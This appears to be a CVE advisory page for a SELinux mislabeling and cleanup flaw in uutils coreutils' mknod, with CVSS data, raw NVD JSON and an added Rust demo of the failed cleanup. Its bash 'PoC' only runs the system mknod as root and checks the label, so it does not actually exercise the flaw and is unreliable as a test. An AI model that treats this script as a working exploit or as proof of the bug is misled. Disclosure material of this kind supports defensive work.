Security Vulnerability Report
CVE-2026-35361 CVSS 3.4 LOW

Published: 2026-04-22 17:16:39
Last Modified: 2026-04-27 12:27:21

Description

The mknod utility in uutils coreutils fails to handle security labels atomically by creating device nodes before setting the SELinux context. If labeling fails, the utility attempts cleanup using std::fs::remove_dir, which cannot remove device nodes or FIFOs. This leaves mislabeled nodes behind with incorrect default contexts, potentially allowing unauthorized access to device nodes that should have been restricted by mandatory access controls.
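The cleanup failure described above can be reproduced without privileges on a FIFO. This is an added example, not code from uutils coreutils or from this report: `set_context` is a hypothetical stand-in for the labeling step that always fails, the FIFO is created with the system `mkfifo` command, and `remove_file` is shown only for contrast, not as the project's patch.

```rust
use std::fs;
use std::io;
use std::path::{Path, PathBuf};
use std::process::Command;

// Hypothetical stand-in for the SELinux labeling step: always fails (constructed).
fn set_context(_path: &Path) -> io::Result<()> {
    Err(io::Error::new(io::ErrorKind::Other, "constructed labeling failure"))
}

// A FIFO needs no privileges; rmdir(2) rejects it the same way it rejects a device node.
fn make_fifo(path: &Path) -> io::Result<()> {
    if Command::new("mkfifo").arg(path).status()?.success() {
        Ok(())
    } else {
        Err(io::Error::new(io::ErrorKind::Other, "mkfifo failed"))
    }
}

fn cleanup_remove_dir(p: &Path) -> io::Result<()> { fs::remove_dir(p) }
fn cleanup_remove_file(p: &Path) -> io::Result<()> { fs::remove_file(p) }

// Create first, label second; on labeling failure run `cleanup`.
// Returns true if the unlabeled node is still on disk afterwards.
fn create_then_label(path: &Path, cleanup: fn(&Path) -> io::Result<()>) -> io::Result<bool> {
    make_fifo(path)?;
    if set_context(path).is_err() {
        if let Err(e) = cleanup(path) {
            eprintln!("cleanup of {} failed: {}", path.display(), e);
        }
    }
    Ok(fs::symlink_metadata(path).is_ok())
}

fn scratch(name: &str) -> PathBuf {
    std::env::temp_dir().join(format!("{}-{}", name, std::process::id()))
}

fn main() -> io::Result<()> {
    let a = scratch("cve-demo-remove-dir");
    println!("remove_dir cleanup leaves node behind: {}", create_then_label(&a, cleanup_remove_dir)?);
    fs::remove_file(&a)?; // tidy up the leftover FIFO
    let b = scratch("cve-demo-remove-file");
    println!("remove_file cleanup leaves node behind: {}", create_then_label(&b, cleanup_remove_file)?);
    Ok(())
}
```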

CVSS Details

CVSS Score: 3.4
Severity: LOW
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:uutils:coreutils:*:*:*:*:*:rust:*:* - VULNERABLE
uutils coreutils < 0.6.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
bash
#!/bin/bash
# PoC for CVE-2026-35361: uutils coreutils mknod cleanup failure
# This script demonstrates the scenario where a device node is created
# but fails to set the correct SELinux context, leaving a vulnerable node.

DEVICE_NAME="vuln_device"
DEVICE_PATH="/tmp/$DEVICE_NAME"

echo "[+] Attempting to create device node to trigger atomicity failure..."

# Simulate the vulnerable behavior: Create node then fail context setting
# In a real vulnerable version, 'mknod' might fail internally but leave the file
# Here we mimic the result: a node exists with default context

# Check if running as root (required for mknod)
if [ "$EUID" -ne 0 ]; then
    echo "[-] Please run as root to execute mknod"
    exit 1
fi

# Create a dummy character device (Major 1, Minor 3 - null device usually)
# Using standard mknod to demonstrate the artifact left behind
mknod "$DEVICE_PATH" c 1 3

if [ -e "$DEVICE_PATH" ]; then
    echo "[+] Device node created at $DEVICE_PATH"
    echo "[+] Checking SELinux context:"
    ls -Z "$DEVICE_PATH"
    echo "[!] If the context is 'device_t' or default instead of a specific restricted context, the system might be vulnerable."
    # Cleanup for PoC
    rm -f "$DEVICE_PATH"
else
    echo "[-] Failed to create device node"
fi

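References

https://github.com/uutils/coreutils/pull/10582 (Exploit, Issue Tracking, Patch)
https://github.com/uutils/coreutils/releases/tag/0.6.0 (Release Notes)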

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-35361", "sourceIdentifier": "[email protected]", "published": "2026-04-22T17:16:38.827", "lastModified": "2026-04-27T12:27:20.527", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The mknod utility in uutils coreutils fails to handle security labels atomically by creating device nodes before setting the SELinux context. If labeling fails, the utility attempts cleanup using std::fs::remove_dir, which cannot remove device nodes or FIFOs. This leaves mislabeled nodes behind with incorrect default contexts, potentially allowing unauthorized access to device nodes that should have been restricted by mandatory access controls."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N", "baseScore": 3.4, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.8, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 4.4, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-281"}, {"lang": "en", "value": "CWE-459"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:uutils:coreutils:*:*:*:*:*:rust:*:*", "versionEndExcluding": "0.6.0", 
"matchCriteriaId": "87C33018-2E08-45B0-B69C-7FC224F7F883"}]}]}], "references": [{"url": "https://github.com/uutils/coreutils/pull/10582", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Patch"]}, {"url": "https://github.com/uutils/coreutils/releases/tag/0.6.0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/uutils/coreutils/pull/10582", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking", "Patch"]}]}}